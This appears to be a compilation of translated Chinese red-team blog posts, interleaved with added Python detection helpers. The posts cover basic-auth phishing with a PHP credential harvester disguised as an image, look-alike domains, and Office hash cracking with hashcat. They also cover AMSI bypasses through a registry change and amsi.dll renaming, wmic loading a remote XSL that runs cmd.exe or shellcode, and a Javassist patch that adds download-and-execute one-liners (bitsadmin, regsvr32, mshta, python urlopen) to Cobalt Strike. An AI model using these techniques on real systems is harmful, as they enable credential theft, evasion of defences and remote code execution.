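    """Collect single-line rewrite directives from an nginx config, ignoring comments."""
    rules = []
    for n, raw in enumerate(conf.splitlines(), 1):
        m = REWRITE_RE.match(raw.split("#", 1)[0])
        if m:
            rules.append(RewriteRule(n, m.group(1), m.group(2), m.group(3) or ""))
    return rules


def pattern_extensions(pattern: str) -> Set[str]:
    r"""Literal extension(s) a rewrite regex ends with: '^/img/test\.png$' -> {'png'},
    '\.(gif|jpg)$' -> {'gif', 'jpg'}. Patterns without a literal extension give an empty set."""
    m = re.search(r"\\\.\(?([\w|]+)\)?\$?$", pattern)
    return set(m.group(1).lower().split("|")) if m else set()


def target_extension(target: str) -> str:
    """Extension of the rewrite target, ignoring a query string: '/index.php?page=$1' -> 'php'."""
    m = re.search(r"\.(\w+)(?:\?|$)", target)
    return m.group(1).lower() if m else ""


def suspicious_rewrites(conf: str) -> List[RewriteRule]:
    """Rewrites that map a static-looking URL onto a script: the disguise described above."""
    return [r for r in parse_rewrites(conf)
            if pattern_extensions(r.pattern) & STATIC_EXT and target_extension(r.target) in SCRIPT_EXT]


# Constructed sample: the vhost from this post plus two routine rewrites
SAMPLE_CONF = r"""
server {
    listen 80;
    server_name mydomain.com;
    root /www/mydomain;
    # pretty URLs for a CMS: html -> php is routine and is not reported by this check
    rewrite ^/(.*)\.html$ /index.php?page=$1 last;
    rewrite ^/old/(.*)$ /new/$1 permanent;
    location ~ \.png$ {
        rewrite ^/img/test\.png$ /img/test.php last;
    }
    location ~ \.php$ {
        fastcgi_pass 127.0.0.1:9000;
    }
}
"""

if __name__ == "__main__":
    for r in suspicious_rewrites(SAMPLE_CONF):
        print(f"line {r.line}: {r.pattern} -> {r.target} {r.flag}".rstrip())
```

The same idea applies to `.htaccess` `RewriteRule` lines on Apache; only the directive syntax differs. Whether html-to-php counts as suspicious is a policy choice, which is why the extension sets are plain module-level constants.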

    0x02 Basic authentication phishing

    Basic authentication phishing was described in articles long ago, for example how to build a basic auth phishing page. The principle is to insert into the page an img element that points at a PHP file:

    <img src="http://site.com/1.php" alt="Could not load image - Invalid credentials."/>
    

    The PHP code just returns a 401 authentication challenge. When the user opens the page, the request to http://site.com/1.php pops up an authentication dialog; once the user enters a username and password, the attacker records them.

    Note: this method works in Firefox and IE; Chrome does not pop up a basic auth dialog for this.

    To make the attack stealthier, we can use rewrite to rewrite the URL so that the requested link has an image extension. To make it more effective, I wrote the following PHP code:

    <?php
    $now = new DateTime();
    $user = isset($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : "";
    $pass = isset($_SERVER['PHP_AUTH_PW'])   ? $_SERVER['PHP_AUTH_PW']   : "";
    $line = 0; // entries already recorded for this client
    if ($user && $pass){
        $fp = fopen("count.txt", "a");
        $ip = $_SERVER["REMOTE_ADDR"];
        $all = file_get_contents("count.txt");
        fwrite($fp, $now->format("Y-m-d H:i:s") . "\t" . $ip . "\t" . $user . ":" . $pass . "\n");
        $line = substr_count($all,$ip);
        fclose($fp);
    }
    if($line < 2){
        header('WWW-Authenticate: Basic realm="Corporate domain"');
    }else{
        header('content-type: image/png');
        echo file_get_contents("test.png");
    }
    ?>
    

    The code pops up the authentication dialog, waits for input, and stores the entered username and password in count.txt. Once this user has entered credentials 3 times (a single entry may be something typed at random), it serves the normal image. Demo:

    4878.gif
    Of course you can add other behaviour, such as sending the credentials to a mailbox.

    With the PHP code written, how is it used?
    What we need is to find editors that allow inserting remote images, then insert our link. If the site embeds the link directly, our authentication page is loaded whenever the page loads. Besides making the extension look like an image file, rewrite can also get past some editors, for example those that preview the image when a remote image is inserted:

    1520488071492.png

    In that case we can first insert the image with nginx in its default configuration, as shown below:

    1520488284941.png

    After the insert succeeds and is submitted, change the rewrite again. This gets around such checks. An attack in one scenario looks like this:
    demo:
    demo.gif

    For better effect, the attacker can register a domain that looks trustworthy. For example, if the target is targetdomain.com, they could register look-alike addresses such as:

    targetdomain.co
    targetdomain.net
    target-domain.com
    targetdomain-oauth.com
    targetdomain-cdn.com
    targetdomain-images.com
    login-targetdomain.com
    

  • 03/31/18--21:00: Cobalt strike3.8 中文支持 (chan 69772723)
    0x00 Introduction

    Cobalt Strike 3.10 has been out for a long time, and its most attractive feature is probably that it now supports Chinese. But I have not seen 3.10 online for a long while, so I had to make do by modifying the 3.8 I have.

    0x01 Decompiling

    First we decompile Cobalt Strike 3.8; refer to the earlier cracking write-up (link) and decompile with jad.

    1522336230599.png

    0x02 Modifying the code

    How do we locate what to change?
    Look at CS's output:

    1522336286954.png

    Before the output there is "received output", so searching for this keyword immediately locates the BeaconC2.class file; searching for "received output" gives 5 results:

    1522336540818.png

    The code looks like this:

    1522336597408.png

    The output is returned by the bString method of the CommonUtils class; locate CommonUtils.class and look at the code:

    1522336678669.png

    The incoming data is decoded as ISO8859-1. ISO8859-1 is a single-byte encoding covering at most the range 0-255 and is used for English-family text; for example the letter a is 0x61 = 97. Clearly the range of characters ISO8859-1 can represent is narrow and cannot express Chinese characters, which is why CS cannot display Chinese. Testing shows that using ISO8859-1 as the intermediate encoding does not lose data. So can we modify the code to convert the encoding back? Of course!

    But, being rather inexperienced, I could not get CommonUtils.java to compile after modifying it directly (frustrating; if you know how, please share). So I could only modify BeaconC2.java.

    After repeated testing, I found that the result returned after executing a command in CS is GBK-encoded, so the conversion in CommonUtils.java is:

    GBK -> ISO8859-1
    

    And what we change in BeaconC2:

    ISO8859-1 -> GBK -> UTF-8
    

    So the idea is clear: convert the Chinese to UTF-8 before it is passed on as rest. The code is simple; test as follows:

    1522337535419.png

    The key code is:

    String tmp = CommonUtils.bString(CommonUtils.readAll(in));
    String tmp1 = new String(tmp.getBytes("ISO8859-1"),"gbk");
    String rest = new String(tmp1.getBytes(),"utf-8");
    

    The original code:

    1522337880400.png

    After modification:

    1522337852391.png

    So find every occurrence of:

     String rest = CommonUtils.bString(CommonUtils.readAll(in));
    

    and replace it.
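
The two claims the fix rests on, that decoding bytes as ISO8859-1 loses nothing and that the same bytes read as GBK give the real text, can be checked outside CS. The Python below is an added example (not from the original post); `bstring` mirrors what CommonUtils.bString does, `recover_text` is the patched BeaconC2 conversion, and `recover_text_tolerant` is an assumed defensive variant that substitutes U+FFFD for a byte sequence that is not valid GBK instead of throwing. The sample bytes are constructed: the GBK encoding of "目录 C:\", as a Chinese-locale cmd.exe would emit it.

```python
def bstring(raw: bytes) -> str:
    """What CommonUtils.bString does: each byte becomes one ISO8859-1 code point (0-255), losslessly."""
    return raw.decode("iso8859-1")


def recover_text(rest: str, source_encoding: str = "gbk") -> str:
    """The patch described above: ISO8859-1 string -> original bytes -> decode as the real encoding."""
    return rest.encode("iso8859-1").decode(source_encoding)


def recover_text_tolerant(rest: str, source_encoding: str = "gbk") -> str:
    """Assumed defensive variant (not in the post): same conversion, but a sequence that is not
    valid in the source encoding becomes U+FFFD instead of raising and losing the whole line."""
    return rest.encode("iso8859-1").decode(source_encoding, errors="replace")


# Constructed sample: GBK (code page 936) bytes of "目录 C:\"
SAMPLE_GBK_OUTPUT = "目录 C:\\".encode("gbk")

if __name__ == "__main__":
    rest = bstring(SAMPLE_GBK_OUTPUT)
    print(repr(rest))                 # the mojibake CS shows today
    print(recover_text(rest))         # 目录 C:\
```

Note that GBK bytes can also be valid UTF-8: `SAMPLE_GBK_OUTPUT.decode("utf-8")` succeeds and yields "Ŀ¼ C:\". Guessing the encoding from the bytes is therefore not reliable; the patch works because the Beacon's code page is known to be GBK, and the final `new String(tmp1.getBytes(), "utf-8")` step in the Java only behaves as intended when the JVM's default charset is UTF-8.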

    0x03 Compile and replace

    After modifying, compile BeaconC2.java and replace the original BeaconC2.class. Compiling is simple: put BeaconC2.java in the unpacked CS directory and run:

    javac -classpath . BeaconC2.java -Xlint:unchecked
    

    Here you may hit the following error:

    1522338365724.png

    Change the code, replacing

    import c2profile.MalleableHook.MyHook;
    import dns.DNSServer.Handler;
    

    with:

    import c2profile.MalleableHook;
    import dns.DNSServer;
    

    and compile again. Then replace the original BeaconC2.class and our CS modification is complete.

    0x04 Result

    I recorded a demo:

    CS.gif

    I will not distribute CS here, but I share the modified BeaconC2.class: open CS as an archive and replace BeaconC2.class in the beacon directory. Download link.



    First download office2john.py. The encryption it supports cracking is Office's built-in password protection:
    83000-eyr1re7d788.png
    Use office2john to convert the Office file into a hash:

    python office2john.py 123.docx > hash.txt
    

    48261-cl8sxps7xum.png
    Use the following command to cut out the hash and convert it into the form hashcat accepts:

    awk -F ":" '{print $2}' hash.txt > hashhc.txt
    

    06114-1kst5rl8a9g.png
    Crack it with hashcat:

    hashcat -m 9500 hashhc.txt ~/wordlist/passwd.txt -o out.txt
    

    I used Office 2010 here, so I chose 9500; choose the mode according to the corresponding version.

    The mode for each version can be looked up with hashcat --help.
    17293-xqb7bq65lso.png
    Successful crack:
    56296-fi7e6sribvo.png
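
When auditing the password strength of a batch of protected documents, the `awk -F ":" '{print $2}'` step above is fragile: it takes field two, which is wrong as soon as a file name contains a colon (a Windows path, for instance), and it does not tell you which hashcat mode each line needs. The Python below is an added example (not from the original post) that locates the `$office$` field wherever it sits, reads the version from it and groups the hashes by the hashcat mode they need (9400 for the 2007 format, 9500 for 2010 as used above, 9600 for 2013). The sample output is constructed; the hex fields are placeholders, not real salts or verifiers.

```python
from typing import Dict, List, NamedTuple, Optional

# hashcat -m values for the $office$ hash versions
HASHCAT_MODE = {"2007": 9400, "2010": 9500, "2013": 9600}


class OfficeHash(NamedTuple):
    filename: str
    version: str
    hash: str
    mode: Optional[int]   # None when the version is not one hashcat knows under these modes


def extract_office_hash(line: str) -> Optional[OfficeHash]:
    """Pull the $office$ field out of one office2john output line without assuming it is field 2."""
    fields = line.rstrip("\n").split(":")
    for i, f in enumerate(fields):
        if f.startswith("$office$*"):
            parts = f.split("*")
            # $office$ * version * iterations * keysize * saltsize * salt * verifier * verifierHash
            if len(parts) < 8:
                return None
            version = parts[1]
            return OfficeHash(":".join(fields[:i]), version, f, HASHCAT_MODE.get(version))
    return None


def convert(text: str) -> List[OfficeHash]:
    """All recognisable hashes in a multi-line office2john output."""
    return [h for h in (extract_office_hash(l) for l in text.splitlines()) if h]


def group_by_mode(hashes: List[OfficeHash]) -> Dict[int, List[str]]:
    """One hashcat run per -m value; hashes with an unknown version are left out."""
    groups: Dict[int, List[str]] = {}
    for h in hashes:
        if h.mode is not None:
            groups.setdefault(h.mode, []).append(h.hash)
    return groups


# Constructed sample output (placeholder hex, not real salts/verifiers); note the colon in the second path
SAMPLE_OFFICE2JOHN = (
    "123.docx:$office$*2010*100000*128*16*" + "0a" * 16 + "*" + "1b" * 16 + "*" + "2c" * 32 + "\n"
    + "C:\\docs\\report.xlsx:$office$*2013*100000*256*16*" + "3d" * 16 + "*" + "4e" * 16 + "*" + "5f" * 32 + "\n"
    + "notes.txt:no office hash on this line\n"
)

if __name__ == "__main__":
    for mode, hs in group_by_mode(convert(SAMPLE_OFFICE2JOHN)).items():
        print(f"-m {mode}: {len(hs)} hash(es)")
```

Each group can then be written to its own file and passed to hashcat with the matching `-m`, instead of picking the mode by hand per file.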


  • 06/27/18--00:20: DotNetToJScript 复活之路 (chan 69772723)
    0x00 Introduction

    Last year James Forshaw open-sourced DotNetToJScript, a tool that can load .NET programs from JS, VBS and similar scripts. After its release many tools were built on it, such as StarFighters, CACTUSTORCH and SharpShooter, and script-based attacks increased accordingly, so in Windows 10 Microsoft introduced AMSI, added signatures for DotNetToJScript-based scripts to its detection and flagged the tool as malware. Running a script generated by DotNetToJScript directly is blocked, as shown below.
    1530067126795.png
    Recently I learned two bypass methods, which I share here.

    0x01 Disabling AMSI

    The AMSI disabling described here does not need high privileges, only a simple trick learned from this article. Observe with Process Monitor, with the following filter set:
    1530067444682.png
    Run a script generated by DotNetToJScript and the following call sequence can be observed:
    1530067501155.png
    Here we can see that before AMSI is loaded, the registry value HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable is queried; try setting it to 0:
    1530067589819.png
    Run the script again and the shellcode executes successfully, as shown below:
    bypass
    Although modifying the registry disables AMSI, it needs high privileges, so how can AMSI be disabled with ordinary privileges? From @tiraniddo's article we can see that it can be bypassed through DLL hijacking. Process Monitor shows that C:\Windows\System32\amsi.dll is loaded during detection; what happens if we rename cscript.exe to amsi.dll?

    copy c:\windows\system32\cscript.exe amsi.dll
    amsi.dll evil.js
    

    dllhijack

    The shellcode executes successfully. Change the filter as follows:
    1530068708904.png
    Let us look at the call sequence:
    1530068764803.png
    C:\Windows\System32\amsi.dll is no longer loaded, which is what lets our shellcode run.

    0x02 Using wmic

    A trick shared by Casey Smith (@subTee) on his blog: wmic can invoke XSL (Extensible Stylesheet Language) scripts from a local file or from a URL. Testing shows that DotNetToJScript scripts invoked this way also execute successfully. subTee's article is here. The commands are:

    #Local File
    wmic process list /FORMAT:evil.xsl
    #Remote File
    wmic os get /FORMAT:"https://example.com/evil.xsl"
    

    evil.xsl

    <?xml version='1.0'?>
    <stylesheet
    xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
    xmlns:user="placeholder"
    version="1.0">
    <output method="text"/>
        <ms:script implements-prefix="user" language="JScript">
        <![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
        ]]> </ms:script>
    </stylesheet>
    

    The modified script can be found here (link).
    The following command executes the shellcode:

    wmic os get /FORMAT:"https://raw.githubusercontent.com/Ridter/AMSI_bypass/master/shellcode.xsl"
    

    But there is one problem with wmic: execution from PowerShell fails, as shown below:
    1530081940192.png

    So how do we invoke it?
    After reading this MDSec article, we find it can be invoked through COM. In JavaScript it looks like this:

    var xml = new ActiveXObject("Microsoft.XMLDOM");
    xml.async = false;
    var xsl = xml;
    xsl.load("http://host/a.xsl");
    xml.transformNode(xsl);
    self.close();
    

    So we can build an HTA for remote invocation. For convenience I have written an aggressor script, available on GitHub:

    Usage as shown below:
    demo
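
Both techniques in this post leave artefacts that the same Process Monitor view used to find them will also show to a defender: a RegSetValue that turns AmsiEnable off, an amsi.dll mapped from somewhere other than System32 or SysWOW64 (the renamed cscript.exe), and, for the wmic route, an XSL file that carries an msxsl script block plus a /FORMAT: argument that points at a URL or a stray .xsl. The Python below is an added example (not part of the original post) covering the registry/DLL section and the wmic section together. The Procmon CSV lines are constructed in the column layout of a Procmon CSV export; the XSL is the evil.xsl shown above.

```python
import csv
import io
import re
import xml.etree.ElementTree as ET
from typing import List

EXPECTED_AMSI = {r"c:\windows\system32\amsi.dll", r"c:\windows\syswow64\amsi.dll"}
AMSI_ENABLE_SUFFIX = r"\software\microsoft\windows script\settings\amsienable"
MSXSL_NS = "urn:schemas-microsoft-com:xslt"
COM_CALL = re.compile(r"ActiveXObject|WScript\.Shell|Shell\.Application|CreateObject", re.I)


def scan_procmon_csv(text: str) -> List[str]:
    """Flag the two conditions the post relies on in a Process Monitor CSV export."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        proc, op = row["Process Name"], row["Operation"]
        path, detail = row["Path"], row.get("Detail", "")
        lpath = path.lower()
        if op == "Load Image" and lpath.endswith("amsi.dll") and lpath not in EXPECTED_AMSI:
            findings.append(f"{proc}: amsi.dll mapped from unexpected path {path}")
        if op == "RegSetValue" and lpath.endswith(AMSI_ENABLE_SUFFIX) and re.search(r"data:\s*0\b", detail, re.I):
            findings.append(f"{proc}: AmsiEnable set to 0 under {path}")
    return findings


def scan_xsl(xml_text: str) -> List[str]:
    """Report msxsl script extensions in an XSL document; a plain transform has none."""
    findings = []
    for el in ET.fromstring(xml_text).iter(f"{{{MSXSL_NS}}}script"):
        note = f"msxsl script block, language={el.get('language', 'default')}"
        if COM_CALL.search(el.text or ""):
            note += ", instantiates COM objects"
        findings.append(note)
    return findings


def suspicious_wmic_format(cmdline: str) -> bool:
    """True when wmic /FORMAT: names a URL or an .xsl that is not under System32\\wbem."""
    m = re.search(r"/format:\s*\"?([^\"\s]+)", cmdline, re.I)
    if not m:
        return False
    v = m.group(1).lower()
    return v.startswith(("http://", "https://")) or (v.endswith(".xsl") and "\\wbem\\" not in v)


# Constructed sample in Procmon's CSV column layout (not a real capture)
SAMPLE_PROCMON = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.0","cscript.exe","1234","RegQueryValue","HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable","NAME NOT FOUND","Length: 4"
"10:00:01.1","cscript.exe","1234","Load Image","C:\\Windows\\System32\\amsi.dll","SUCCESS","Image Base: 0x7ffb00000000, Image Size: 0x1b000"
"10:05:00.0","reg.exe","1300","RegSetValue","HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable","SUCCESS","Type: REG_DWORD, Length: 4, Data: 0"
"10:06:00.0","amsi.dll","1400","Load Image","C:\\Users\\user\\Desktop\\amsi.dll","SUCCESS","Image Base: 0x7ff600000000, Image Size: 0x3c000"
'''

# The evil.xsl from the post
SAMPLE_XSL = """<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
    xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
</stylesheet>
"""

if __name__ == "__main__":
    for line in scan_procmon_csv(SAMPLE_PROCMON) + scan_xsl(SAMPLE_XSL):
        print(line)
```

The first two sample rows are the normal sequence (the value is queried, found absent, and the real amsi.dll is loaded) and produce nothing; only the RegSetValue and the Desktop copy of amsi.dll are reported. A process whose own image is named amsi.dll shows up as exactly such a Load Image row.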

    0x03 References

    https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
    https://subt0x11.blogspot.ca/2018/04/wmicexe-whitelisting-bypass-hacking.html?m=1
    https://www.mdsec.co.uk/2018/06/freestyling-with-sharpshooter-v1-0/


  • 06/27/18--00:51: Cobal Strike 自定义OneLiner (chan 69772723)
    0x00 Motivation

    While using Cobalt Strike we can see that several Scripted Web Delivery variants are already integrated, as shown below:

    19484-drjxyu0m4wg.png

    After generating one and opening the site, clicking Copy URL copies out the whole command. I wanted the same when writing an aggressor script, but found that the copy contained only the URL and not the command. To find out why, I unpacked CS, grepped, located common.CommonUtils and found the OneLiner method:
    73927-nvotona7nxc.png

    So to implement this we need to modify this class and add the commands we want.

    0x01 Modifying the class with Javassist

    Javassist is a bytecode manipulation framework with which we can easily modify class code. First download Javassist, create a new Java project, right-click the project and import the Javassist package.

    15585-gsx22q9953w.png

    We often request payloads with mshta http://host/test.png; this can be added with the following code:

    package changeclass;
    
    import java.io.IOException;
    
    import javassist.CannotCompileException;
    import javassist.ClassPool;
    import javassist.CtClass;
    import javassist.CtMethod;
    import javassist.NotFoundException;
    
    public class change {
        public static void main(String[] args) {
            updateMethod();
        }
    
        public static void updateMethod(){
            try {
                ClassPool cPool = new ClassPool(true);
                // if the class references other classes, import them like this
                //cPool.importPackage("java.util.List");
    
                // location of the cobaltstrike.jar file
                cPool.insertClassPath("/tmp/cobaltstrike.jar");
    
                // get the class to be modified
                CtClass cClass = cPool.get("common.CommonUtils");
    
                // get the target method
                CtMethod cMethod = cClass.getDeclaredMethod("OneLiner");
    
                // replace the method body
                // note: parameters are referenced as $1, $2, ... not by name
                cMethod.setBody("{ if (\"bitsadmin\".equals($2)) {"
                        + "String f = garbage(\"temp\");"
                        + "return \"cmd.exe /c bitsadmin /transfer \" + f + \" \" + $1 + \" %APPDATA%\\\\\" + f + \".exe&%APPDATA%\\\\\" + f + \".exe&del %APPDATA%\\\\\" + f + \".exe\";}"
                        + "if (\"powershell\".equals($2)) {"
                        + "return PowerShellOneLiner($1);}"
                        + "if (\"python\".equals($2)) {"
                        + "return \"python -c \\\"import urllib2; exec urllib2.urlopen('\" + $1 + \"').read();\\\"\";}"
                        + "if (\"regsvr32\".equals($2)) {"
                        + "return \"regsvr32 /s /n /u /i:\" + $1 + \" scrobj.dll\";}"
                        + "if (\"mshta\".equals($2)) {"
                        + "return \"mshta \" + $1;}"
                        + "if (\"wmic\".equals($2)) {"
                        + "  return \"wmic os get /format:\\\"\" + $1 + \"\\\"\";}"
                        + "print_error(\"'\" + $2 + \"' for URL '\" + $1 + \"' does not have a one-liner\");"
                        + "throw new RuntimeException(\"'\" + $2 + \"' for URL '\" + $1 + \"' does not have a one-liner\");}");
    
                // output directory for the modified class
                cClass.writeFile("/tmp/");
    
                System.out.println("=======修改方法完=========");
            } catch (NotFoundException e) {
                e.printStackTrace();
            } catch (CannotCompileException e) {
                e.printStackTrace();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    
    }
    

    Note that the method OneLiner(String url, String type) takes two parameters, and parameters inside the method body are numbered from $1. If the method is not static, $0 refers to the instance itself; if it is static, $0 is unavailable. The code you write must also escape " and \.

    Running this code generates a new class:
    39332-5o637aqvh1.png

    41077-02rq3jqomynr.png

    Replace the class in CS with this one.

    To use it, just specify the type in site_host in the aggressor script, for example for wmic:

    site_host(%options["host"], %options["port"], %options["uri"], $data, "text/plain", "Scripted Web Delivery (wmic)"); 
    

    For mshta:

    site_host(%options["host"], %options["port"], %options["htauri"], $htadata, "application/hta", "Scripted Web Delivery (mshta)");
    

    Result:

    The compiled class can be downloaded from GitHub: